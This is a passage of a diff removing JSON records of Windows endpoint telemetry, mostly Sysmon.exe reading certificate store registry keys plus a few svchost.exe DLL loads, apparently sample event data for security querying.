- "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "coml2.dll", - "image_path": "C:\\Windows\\System32\\coml2.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - 
"registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - 
"registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": 